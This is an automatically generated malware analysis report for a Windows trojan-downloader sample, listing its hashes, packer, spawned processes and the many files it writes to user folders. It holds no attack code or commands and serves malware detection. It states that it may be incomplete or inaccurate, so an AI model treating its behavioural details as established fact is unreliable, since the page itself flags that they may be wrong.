Trojan-Downloader.Win32.Adload.efgf_6acad04bb0

by malwarelabrobot on January 15th, 2015 in Malware Descriptions.

Trojan-Downloader.Win32.Adload.efgf (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6acad04bb03501dc920778ed12ba6d63
SHA1: 8742d5aa6108e0142c9511ccb2bd49040791ce3d
SHA256: 383790bd98ec2787bf57fa7e9db4e0ac11355cca830e85104222d447e8320ddf
SSDeep: 98304:lQPSI bq48LiQ9F4yrJ/KRLuDN8OZPYJFyc74yZhhgFl39:m4g5PZZ8OZPU1MchMlN
Size: 3645088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: ????
Created at: 2014-07-09 10:58:13
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

attrib.exe:1168
attrib.exe:1520
%original file name%.exe:2040
riliquicken.exe:408
6acad04bb03501dc920778ed12ba6d63.tmp:560
uCalendar.exe:1840

The Trojan-Downloader injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2040 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp\6acad04bb03501dc920778ed12ba6d63.tmp (7386 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp\6acad04bb03501dc920778ed12ba6d63.tmp (0 bytes)

The process riliquicken.exe:408 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\adb_dev.dll (129151 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX86.exe (23636 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wdj2.tmp (9730 bytes)
%Documents and Settings%\%current user%\My Documents\xiaomama1.ico (4672 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdj_connection.dll (524674 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX64.exe (26068 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\version (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Icon_1[1].ico (11345 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\ssleay32.dll (35828 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\libcurl.dll (40972 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdjconx86.exe (7772 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\WDJDriverInstaller.exe (7772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wdj1.tmp (91 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (920 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdjconx64.exe (12588 bytes)
%Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\libeay32.dll (131173 bytes)

The process 6acad04bb03501dc920778ed12ba6d63.tmp:560 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EACIG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BO590.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EUT2I.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R2SHE.tmp (341 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VUE7K.tmp (854 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CITBH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I07M1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UQKI3.tmp (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-E3NQ3.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J9IO1.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T5GBV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-45E9P.tmp (571 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UT2U1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FSAKH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H9PQM.tmp (372 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HBFP8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MS510.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P460L.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FA3VP.tmp (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ATVIR.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JMCVI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0DT6F.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GG746.tmp (799 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6ABIJ.tmp (418 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UB0UL.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CA7DT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H5M3H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GBDV.tmp (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JC94V.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8P1G7.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4F4V4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S5K1J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM4TE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9K96Q.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HSHNI.tmp (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NC7K8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-8TDL0.tmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A8EAG.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EAR7G.tmp (846 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RDQEM.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-O8MRK.tmp (399 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-7T15P.tmp (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\小新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B31VB.tmp (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8Q63L.tmp (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5VQIL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GS5K.tmp (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9BQPC.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BN1AB.tmp (954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\botva2.dll (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-257BU.tmp (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\CallbackCtrl.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B22SN.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KKAGK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4A2KS.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5UAA5.tmp (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2S8M.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GA32U.tmp (713 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RVE9.tmp (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K5UU2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GN5N1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1Q822.tmp (395 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHN29.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xttj[1].htm (792 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AU387.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-9OFM7.tmp (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-59Q2H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQAU1.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S5QPM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-F61GP.tmp (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EM3D2.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PAS5F.tmp (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCVVM.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MB7TH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DPTNS.tmp (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-USMNK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-84K0R.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FODVB.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UF6NE.tmp (566 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JVH2E.tmp (792 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PEHSU.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.dat (77177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SOF93.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD63S.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE4AE.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-47L4D.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TOHRA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KPEV6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-82AQ4.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\Icons\ab091a108ba11a214cb2497830748b5a.ico (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OIK1B.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LM96A.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2UJR7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BFVNJ.tmp (309 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T7SDK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DMUUF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NQK6G.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-179PC.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VKG5F.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-64LEO.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8IFBJ.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-19FF6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0UA5R.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CK9D1.tmp (833 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-04CEU.tmp (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KSVR2.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0IGTG.tmp (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N3NUO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WListViewEx.dll (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3ID9I.tmp (398 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNKL9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-589D2.tmp (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NK9JL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIS2A.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SIE6F.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-VDS88.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQ06S.tmp (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-15K0J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-26K4C.tmp (613 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\is-F0AFL.tmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ODTLG.tmp (394 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P4A60.tmp (13 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4820 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A0EIM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RNBC6.tmp (395 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LL8KV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LN8C3.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KLVNJ.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DFOPO.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MKQ0P.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CTVUM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FLS7N.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WSysInfo.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6BKNI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B6BC5.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J7PLB.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TKKFL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P73ID.tmp (449 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V911M.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K3A0H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFOCI.tmp (891 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S329D.tmp (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-ACG6D.tmp (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IDDQ0.tmp (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-TBR47.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\info.iam (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DC97P.tmp (857 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RELD2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TLJE9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99O8Q.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VP4MN.tmp (437 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IGNP2.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM9J5.tmp (949 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6H2UT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0L13V.tmp (871 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N5L7C.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A4S61.tmp (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2K1SC.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAG71.tmp (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FPQV4.tmp (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\ItDownload_wex.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BM7CV.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-URB1U.tmp (820 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QDAFG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DO1SP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U18FV.tmp (896 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U189L.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FMB0Q.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DRCF3.tmp (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\16246473[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4J0MN.tmp (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PCUV5.tmp (523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\core[1].php (750 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QJ7LF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4P8GP.tmp (986 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6856F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIMV2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SUTI1.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9IE2G.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2AFEU.tmp (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OUGF5.tmp (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIDQ3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCB5A.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OR4OD.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHIVK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IMBOL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S9S0K.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0FVRG.tmp (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GJFDH.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-71SNV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SJIC0.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6DTUJ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QAKU2.tmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9TLEA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2LCQJ.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-05TI6.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FU923.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R66KJ.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3H86F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GLIR6.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-46B8N.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6G59B.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5FR8P.tmp (913 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TK5N6.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0VFG1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKGKG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SEBU8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GPUG4.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2CI1C.tmp (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L41F1.tmp (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ESTCQ.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2GDDK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9M85H.tmp (1 bytes)
